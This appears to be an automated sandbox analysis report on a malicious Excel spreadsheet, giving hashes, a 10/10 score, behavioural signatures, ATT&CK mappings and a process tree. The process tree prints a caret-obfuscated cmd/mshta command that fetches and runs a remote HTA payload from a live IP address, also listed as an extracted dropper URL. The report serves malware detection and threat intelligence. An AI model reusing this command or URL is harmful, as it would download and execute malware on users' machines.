Analysis

  • max time kernel
    56s
  • max time network
    57s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:54

General

  • Target

    2022-1-28-300d22c0dc46f5cf0fb088f0bc36e543.xls

  • Size

    46KB

  • MD5

    300d22c0dc46f5cf0fb088f0bc36e543

  • SHA1

    966d5b123e0f9048cbaa9d0f08c9abb0b3eb6fca

  • SHA256

    f28bdb9c4fbdc61583fb85ae35bc5e589b0f4a048764c5749209ac519363358f

  • SHA512

    c38c450e4ca8b5ab2593b22c3fec510e3ed5743e8593522c106bbc5950b6b1d6d2574a6b8845f2bfbd74d2a211a704c11a4eacd7dcf8036fddca891e065b5721

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-300d22c0dc46f5cf0fb088f0bc36e543.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2656
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3232
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        PID:3196
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3196 -s 1644
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1840

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2656-117-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmp
    Filesize

    64KB

  • memory/2656-118-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmp
    Filesize

    64KB

  • memory/2656-119-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmp
    Filesize

    64KB

  • memory/2656-120-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmp
    Filesize

    64KB

  • memory/2656-123-0x00007FFE79D20000-0x00007FFE79D30000-memory.dmp
    Filesize

    64KB

  • memory/2656-130-0x00007FFE76C00000-0x00007FFE76C10000-memory.dmp
    Filesize

    64KB

  • memory/2656-131-0x00007FFE76C00000-0x00007FFE76C10000-memory.dmp
    Filesize

    64KB